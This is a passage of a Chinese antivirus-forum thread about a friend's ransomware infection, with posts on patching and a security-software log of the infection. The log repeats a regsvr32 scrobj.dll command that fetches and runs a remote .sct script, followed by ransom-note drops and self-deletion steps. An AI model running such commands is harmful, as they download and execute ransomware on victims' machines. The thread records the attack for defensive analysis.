12
返回列表 发新帖
楼主: sky520471
收起左侧

[其他相关] 勒索軟件unlock程式

[复制链接]
xxl11231220
发表于 2017-5-9 13:53:42 | 显示全部楼层
被勒索前是用什么杀软?
sky520471
 楼主| 发表于 2017-5-10 08:32:18 | 显示全部楼层
xxl11231220 发表于 2017-5-9 13:53
被勒索前是用什么杀软?

那是我朋友電腦,他電腦沒有防毒軟件,我推薦他使用趨勢科技了

這個勒索軟件因該從RDP漏洞進來的,他關了windows update更新
xxl11231220
发表于 2017-5-10 08:51:04 | 显示全部楼层
sky520471 发表于 2017-5-10 08:32
那是我朋友電腦,他電腦沒有防毒軟件,我推薦他使用趨勢科技了

這個勒索軟件因該從RDP漏洞進來的,他 ...

及时更新修补已知漏洞还是很重要的,不说了我得赶紧打补丁去
gwofeng
发表于 2017-5-11 01:45:28 | 显示全部楼层
这个勒索病毒这里有人上传样本吗
liulangzhecgr
发表于 2017-5-11 08:54:33 | 显示全部楼层
本帖最后由 liulangzhecgr 于 2017-5-11 09:20 编辑

利用网页漏洞,不过需要权限...某不幸朋友赋值权限导致。

liulangzhecgr
发表于 2017-5-11 09:19:36 | 显示全部楼层
2017/5/11 08:35:13    创建新进程    允许
进程: c:\program files\internet explorer\iexplore.exe
目标: c:\windows\system32\rundll32.exe
命令行: "C:\Windows\System32\rundll32.exe" SHELL32.DLL,ShellExec_RunDLL regsvr32.exe scrobj.dll /s /u /i:http://44t24846e6zfnb8bz.sawits. ... 62ed1c4030a91fa.sct
规则: [应用程序]*

2017/5/11 08:35:25    创建新进程    阻止
进程: c:\windows\system32\rundll32.exe
目标: c:\windows\system32\regsvr32.exe
命令行: "C:\Windows\system32\regsvr32.exe" scrobj.dll /s /u /i:http://44t24846e6zfnb8bz.sawits. ... 62ed1c4030a91fa.sct
规则: [应用程序]*

2017/5/11 08:37:25    创建新进程    允许
进程: c:\windows\system32\svchost.exe
目标: c:\windows\system32\rundll32.exe
命令行: "C:\Windows\System32\rundll32.exe" SHELL32.DLL,ShellExec_RunDLL regsvr32.exe scrobj.dll /s /u /i:http://44t24846e6zfnb8bz.sawits. ... 62ed1c4030a91fa.sct
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:37:28    向其他进程复制句柄    允许
进程: c:\windows\system32\svchost.exe
目标: c:\program files\internet explorer\iexplore.exe
句柄: (Process) c:\windows\system32\rundll32.exe
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:37:30    向其他进程复制句柄    允许
进程: c:\windows\system32\svchost.exe
目标: c:\program files\internet explorer\iexplore.exe
句柄: (Thread) c:\windows\system32\rundll32.exe
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:37:33    创建新进程    允许
进程: c:\windows\system32\rundll32.exe
目标: c:\windows\system32\regsvr32.exe
命令行: "C:\Windows\system32\regsvr32.exe" scrobj.dll /s /u /i:http://44t24846e6zfnb8bz.sawits. ... 62ed1c4030a91fa.sct
规则: [应用程序]*

2017/5/11 08:38:39    创建新进程    允许
进程: c:\windows\system32\svchost.exe
目标: c:\windows\system32\rundll32.exe
命令行: "C:\Windows\System32\rundll32.exe" SHELL32.DLL,ShellExec_RunDLL regsvr32.exe scrobj.dll /s /u /i:http://44t24846e6zfnb8bz.sawits. ... 62ed1c4030a91fa.sct
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:38:41    向其他进程复制句柄    允许
进程: c:\windows\system32\svchost.exe
目标: c:\program files\internet explorer\iexplore.exe
句柄: (Process) c:\windows\system32\rundll32.exe
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:38:43    向其他进程复制句柄    允许
进程: c:\windows\system32\svchost.exe
目标: c:\program files\internet explorer\iexplore.exe
句柄: (Thread) c:\windows\system32\rundll32.exe
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:38:47    创建新进程    允许
进程: c:\windows\system32\rundll32.exe
目标: c:\windows\system32\regsvr32.exe
命令行: "C:\Windows\system32\regsvr32.exe" scrobj.dll /s /u /i:http://44t24846e6zfnb8bz.sawits. ... 62ed1c4030a91fa.sct
规则: [应用程序]*

2017/5/11 08:39:58    创建新进程    允许
进程: c:\windows\system32\svchost.exe
目标: c:\windows\system32\rundll32.exe
命令行: "C:\Windows\System32\rundll32.exe" SHELL32.DLL,ShellExec_RunDLL regsvr32.exe scrobj.dll /s /u /i:http://44t24846e6zfnb8bz.sawits. ... 62ed1c4030a91fa.sct
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:40:03    向其他进程复制句柄    允许
进程: c:\windows\system32\svchost.exe
目标: c:\program files\internet explorer\iexplore.exe
句柄: (Process) c:\windows\system32\rundll32.exe
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:40:06    向其他进程复制句柄    允许
进程: c:\windows\system32\svchost.exe
目标: c:\program files\internet explorer\iexplore.exe
句柄: (Thread) c:\windows\system32\rundll32.exe
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:40:09    创建新进程    允许
进程: c:\windows\system32\rundll32.exe
目标: c:\windows\system32\regsvr32.exe
命令行: "C:\Windows\system32\regsvr32.exe" scrobj.dll /s /u /i:http://44t24846e6zfnb8bz.sawits. ... 62ed1c4030a91fa.sct
规则: [应用程序]*

2017/5/11 08:40:34    修改文件    阻止
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: E:\MyTools\FixTools\RegBak_1.2_HA_XiaZaiBa\RegBak 1.2\date\2015-03-25\Regbak.chm
规则: [文件组]所有执行文件 -> [文件]*; *.chm

2017/5/11 08:40:47    修改文件    阻止
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: E:\MyTools\FixTools\RegBak_1.2_HA_XiaZaiBa\RegBak 1.2\regbak.chm
规则: [文件组]所有执行文件 -> [文件]*; *.chm

2017/5/11 08:40:51    修改文件    阻止
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: E:\MyTools\FixTools\Registry_Winner_5.9.7.25\manual.chm
规则: [文件组]所有执行文件 -> [文件]*; *.chm

2017/5/11 08:41:01    修改文件    阻止
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: E:\MyTools\RestoreTools\RegBak_1.2_HA_XiaZaiBa\RegBak 1.2\regbak.chm
规则: [文件组]所有执行文件 -> [文件]*; *.chm

2017/5/11 08:41:37    修改文件    阻止
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: E:\MyTools\Scaner\ViewWizard_2.72_\[句柄精灵]ViewWizard_2.8_(含新版3.1)\更强大的新版 ViewWizard 3.1(最牛窗口编程)\mscomctl.ocx
规则: [文件组]所有执行文件 -> [文件]*; *.ocx

2017/5/11 08:41:58    创建文件    允许
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: C:\_READ_THIS_FILE_WLXE_.hta
规则: [文件]?:\

2017/5/11 08:43:12    创建新进程    允许
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: c:\windows\system32\mshta.exe
命令行: "C:\Windows\System32\mshta.exe" "C:\_READ_THIS_FILE_WLXE_.hta"
规则: [应用程序]*

2017/5/11 08:43:20    创建文件    允许
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: C:\_READ_THIS_FILE_JYTZXT1G_.txt
规则: [文件]?:\

2017/5/11 08:44:02    创建新进程    允许
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: c:\windows\system32\notepad.exe
命令行: "C:\Windows\System32\NOTEPAD.EXE" C:\_READ_THIS_FILE_JYTZXT1G_.txt
规则: [应用程序]*

2017/5/11 08:46:21    修改文件    允许
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: \Device\NamedPipe\wkssvc
规则: [文件组]访问设备 -> [文件]\device\namedpipe\wkssvc

2017/5/11 08:46:49    创建新进程    允许
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: c:\windows\system32\cmd.exe
命令行: "C:\Windows\system32\cmd.exe"
规则: [应用程序]*

2017/5/11 08:47:05    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\taskkill.exe
命令行: taskkill  /f /im "a.exe"  
规则: [应用程序]*

2017/5/11 08:51:31    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\ping.exe
命令行: ping  -n 1 127.0.0.1  
规则: [应用程序]*

2017/5/11 08:51:34    向其他进程复制句柄    允许
进程: c:\windows\system32\conhost.exe
目标: c:\windows\system32\ping.exe
句柄: (Event) 0x0000007C
规则: [应用程序]*

2017/5/11 08:51:49    删除文件    允许
进程: c:\windows\system32\cmd.exe
目标: C:\Users\yiqing\AppData\Local\Temp\Low\a.exe
规则: [文件组]所有执行文件 -> [文件]*; *.exe
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-20 11:07 , Processed in 0.105791 second(s), 13 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表